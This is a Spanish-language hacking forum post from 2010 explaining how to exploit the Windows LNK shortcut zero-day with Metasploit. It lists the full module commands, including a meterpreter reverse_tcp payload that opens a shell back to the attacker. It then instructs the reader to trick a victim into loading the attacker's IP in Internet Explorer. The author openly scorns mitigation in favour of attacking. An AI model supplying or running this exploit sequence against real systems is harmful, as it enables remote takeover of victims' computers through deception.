send
Grupo de Telegram
play_arrow
  3. Explotando "LNK" con MetaSploit 0-day
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.
« anterior próximo »
Páginas: [1]   Ir Abajo

Explotando "LNK" con MetaSploit 0-day

  • 0 Respuestas
  • 1393 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Devilboy

  • *
  • Underc0der
  • Mensajes: 328
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Explotando "LNK" con MetaSploit 0-day

« en: Julio 23, 2010, 03:14:24 pm »
Bueno, como muchos sabran, y los que no, se enteraran ahora, hay una vulnerabilidad 0day en todas sus versiones de windows, explicada aca

La noticia no la publique porque ya la habia posteado un usuario, asique, pasados los dias, ya salio tanto su exploit, como un solucion provisoria hasta el parche oficial de MS. Y a eso viene esta entrada...

Primero a lo que nos interesa... La mitigacion? Naa, eso para maricones, la explotacion!.

Explotando "LNK" con MetaSploit


en kungfoosion.com de leo pigñer nos enseña como explotarlo con metasploit

MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST nuestra_ip
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST nuestraip
set LPORT 443
exploit


despues de esto solo pedimos a la victima ke abra internet explorer y ponga nuestra_ip en la url y listo tendrèmos shell

Yo lo probé con un windows xp sp3 y funca, en vista y 7 no se xq no tengo xD

Fuente DDlr
En línea

Veo Una Energia Que Con Deceo de Justicia... Veo Mas Alla de LAs Letras Escritas...
Veo Un Hacktivismo Puro... Nacido De lo Mas Profundo De un Corazon..
Con La Mirada Firme En Defender Mis Ideales...

Páginas: [1]   Ir Arriba
« anterior próximo »
 

¿Te gustó el post? COMPARTILO!



Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

 Respuestas: 24
Vistas: 18683 		Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

 Respuestas: 2
Vistas: 1705 		Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Send vídeo Youtube the victim with Metasploit

Iniciado por BrowserNet

 Respuestas: 1
Vistas: 2269 		Último mensaje Mayo 23, 2016, 07:46:58 pm
por Random
Usando PRY en el desarrollo de módulos para Metasploit.

Iniciado por morodog

 Respuestas: 2
Vistas: 2408 		Último mensaje Octubre 05, 2015, 10:42:08 pm
por Stuxnet
Cómo explotar vulnerabilidad de Windows 7 con Metasploit

Iniciado por Pekador

 Respuestas: 2
Vistas: 4228 		Último mensaje Abril 16, 2012, 04:35:47 pm
por SPELINAX